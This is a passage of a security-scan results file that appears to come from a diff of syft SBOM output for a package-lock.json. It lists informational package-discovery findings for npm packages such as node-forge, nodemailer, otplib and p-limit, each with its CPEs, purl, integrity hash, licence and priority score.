cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/node-forge@1.4.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz + integrity: sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c9ae4bba0c53507d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: node-releases 2.0.38' + title: node-releases 2.0.38 + description: 'Package discovered: node-releases 2.0.38' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 157e4f935702d7be + name: node-releases + version: 2.0.38 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/node-releases@2.0.38 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz + integrity: sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b468b7afcd57f5e8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: nodemailer 6.10.1' + title: nodemailer 6.10.1 + description: 'Package discovered: nodemailer 6.10.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bdc7a63994d0b28a + name: nodemailer + version: 6.10.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT-0 + spdxExpression: MIT-0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/nodemailer@6.10.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz + integrity: sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eca5920a6d6c920a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: nopt 7.2.1' + title: nopt 7.2.1 + description: 'Package discovered: nopt 7.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 47f001cd3ecd3ee8 + name: nopt + version: 7.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/nopt@7.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz + integrity: sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w== + dependencies: + abbrev: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b6fa9eec1e273eef + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: normalize-path 3.0.0' + title: normalize-path 3.0.0 + description: 'Package discovered: normalize-path 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 86c9c8fe4da1b72f + name: normalize-path + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/normalize-path@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz + integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0c9db30b81ebd770 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: normalize-svg-path 1.1.0' + title: normalize-svg-path 1.1.0 + description: 'Package discovered: normalize-svg-path 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2e420341fd4164af + name: normalize-svg-path + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/normalize-svg-path@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz + integrity: sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg== + dependencies: + svg-arc-to-cubic-bezier: ^3.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bb2a72a38fc8e367 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: object-assign 4.1.1' + title: object-assign 4.1.1 + description: 'Package discovered: object-assign 4.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d7b65c8670c0c943 + name: object-assign + version: 4.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/object-assign@4.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz + integrity: sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7280439ae019eb34 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: object-hash 3.0.0' + title: object-hash 3.0.0 + description: 'Package discovered: object-hash 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f0415e28bd0fa73d + name: object-hash + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/object-hash@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz + integrity: sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 570f098417dfedef + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: object-inspect 1.13.4' + title: object-inspect 1.13.4 + description: 'Package discovered: object-inspect 1.13.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 67701f4036faa68d + name: object-inspect + version: 1.13.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/object-inspect@1.13.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz + integrity: sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 276b1e3a3b3501f5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: on-finished 2.3.0' + title: on-finished 2.3.0 + description: 'Package discovered: on-finished 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3329ff372baa3c68 + name: on-finished + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/on-finished@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz + integrity: sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww== + dependencies: + ee-first: 1.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1ede69e18336ab8f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: on-finished 2.4.1' + title: on-finished 2.4.1 + description: 'Package discovered: on-finished 2.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9c42ff2fa50e9c68 + name: on-finished + version: 2.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/on-finished@2.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz + integrity: sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg== + dependencies: + ee-first: 1.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 01ce9d2b89e4c438 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: on-headers 1.1.0' + title: on-headers 1.1.0 + description: 'Package discovered: on-headers 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c535b114447926f1 + name: on-headers + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/on-headers@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz + integrity: sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bd9248df9b4e52cf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: once 1.4.0' + title: once 1.4.0 + description: 'Package discovered: once 1.4.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3f85171a571bc28a + name: once + version: 1.4.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/once@1.4.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/once/-/once-1.4.0.tgz + integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w== + dependencies: + wrappy: '1' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 92e0060edd98f736 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: otplib 12.0.1' + title: otplib 12.0.1 + description: 'Package discovered: otplib 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7b45ff9710a4aaac + name: otplib + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/otplib@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz + integrity: sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg== + dependencies: + '@otplib/core': ^12.0.1 + '@otplib/preset-default': ^12.0.1 + '@otplib/preset-v11': ^12.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1061878b64866643 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: p-limit 2.3.0' + title: p-limit 2.3.0 + description: 'Package discovered: p-limit 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c6cc7a145d3e597c + name: p-limit + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/p-limit@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz + integrity: sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w== + dependencies: + p-try: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6cbc6aaefd17b7fc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: p-limit 3.1.0' + title: p-limit 3.1.0 + description: 'Package discovered: p-limit 3.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bdf7b3073a60eac3 + name: p-limit + version: 3.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: 